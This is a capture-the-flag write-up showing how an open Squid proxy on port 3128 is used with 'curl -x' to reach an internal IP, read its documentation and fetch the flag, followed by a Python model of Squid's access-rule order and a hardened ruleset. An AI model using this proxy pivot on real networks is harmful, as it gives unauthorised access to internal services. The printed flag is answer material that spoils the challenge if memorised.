Difficulty
Moderate 40 points
How to solve
When you open the webpage you get a link to the flag, but unfortunately that link results in a Forbidden
error. The second link on that webpage refers to a documentation page, but points to an internal IP address.
On the same IP address as the webserver, a process is running on port 3128. This port is well known for hosting the caching proxy server "Squid". Trying to proxy requests to the documentation through "Squid" using:
$ curl -x http://IP_OF_CHALLENGE:3128 http://10.10.0.33/documentation.txt
reveals the content of the documentation site:
TODO: document infrastructure
This means that the proxy does not sufficiently protect the internal network it has access to. Therefore, we might be able to fetch the flag from the same IP address through the proxy:
$ curl -x http://IP_OF_CHALLENGE:3128 http://10.10.0.33/flag.txt
IGCTF{BeCarefulWithTheRules}
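The rule problem behind this, as an added example that is not part of the original writeup: a simplified Python model of Squid's first-match http_access evaluation, run over a permissive ruleset and a corrected one. Both rulesets, the ACL names and the client addresses are constructed assumptions (the challenge's real squid.conf is not shown), and only src/dst ACLs on literal IPs are modelled.

```python
import ipaddress

# Constructed rulesets (assumptions, not the challenge's real squid.conf).
WEAK = """
acl clients src 0.0.0.0/0
http_access allow clients
http_access deny all
"""
HARDENED = """
acl clients src 203.0.113.0/24
acl internal dst 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 127.0.0.0/8
http_access deny internal
http_access allow clients
http_access deny all
"""

def parse(conf):
    """Collect src/dst ACLs and the ordered http_access rules."""
    acls = {"all": ("src", [ipaddress.ip_network("0.0.0.0/0")])}  # built-in ACL
    rules = []
    for line in conf.splitlines():
        tok = line.split("#")[0].split()
        if len(tok) >= 4 and tok[0] == "acl" and tok[2] in ("src", "dst"):
            _, old = acls.get(tok[1], (tok[2], []))
            # Several values in one ACL are OR-ed together.
            acls[tok[1]] = (tok[2], old + [ipaddress.ip_network(v) for v in tok[3:]])
        elif len(tok) >= 3 and tok[0] == "http_access":
            rules.append((tok[1] == "allow", tok[2:]))
    return acls, rules

def allowed(conf, client, dest):
    """True if the proxy would relay a request from client to dest."""
    acls, rules = parse(conf)
    addr = {"src": ipaddress.ip_address(client), "dst": ipaddress.ip_address(dest)}

    def match(name):
        kind, nets = acls[name.lstrip("!")]
        return any(addr[kind] in n for n in nets) != name.startswith("!")

    for allow, names in rules:
        if all(match(n) for n in names):  # ACLs on one line are AND-ed
            return allow                  # first matching rule decides
    # No rule matched: the opposite of the last rule; deny if there are none.
    return not rules[-1][0] if rules else False
```

In the corrected ruleset the deny on internal destinations has to come before the client allow, because the first matching line wins.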
Flag
IGCTF{BeCarefulWithTheRules}